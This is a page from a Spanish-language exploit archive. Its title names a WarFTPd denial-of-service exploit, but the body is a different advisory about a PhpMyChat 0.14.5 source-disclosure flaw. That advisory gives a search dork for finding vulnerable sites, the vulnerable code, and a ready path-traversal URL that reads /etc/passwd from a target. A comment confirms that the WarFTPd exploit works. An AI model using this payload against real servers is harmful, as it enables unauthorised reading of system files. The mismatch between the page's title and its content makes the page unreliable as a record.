ExploitsClaseDoS

WarFTPd 1.82.00-RC11 Remote Denial Of Service

Ju, 09/11/2006 - 19:31 — OeX
*******************************************************************************
# Title  :  PhpMyChat  <= 0.14.5 Source Code Disclosure Vulnerability

# Author :   ajann

# Dork :   phpMyChat 0.14.5 , phpMyChat

# Vuln;

*******************************************************************************
[File]
localization/languages.lib.php3
[/File]

[Code,1]
languages.lib.php3 Error:

..
....
require("./${ChatPath}config/config.lib.php3");
require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("./${ChatPath}lib/clean.lib.php3");
....
..

Key [:] ChatPath=[file]

\Example:

http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd

# ajann,Turkey
# ...
# Im not Hacker!
  • 559 lecturas

Comentarios

Ju, 09/08/2007 - 19:22 — Anonimo

on WarFTPd 1.82.00-RC11 Remote Denial Of Service

greetings everyone,
I would like to share with you that it works.
1.82.00 RC11 is indeed vulnerable to that boundaries validation or special character(input validation).

thank you

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.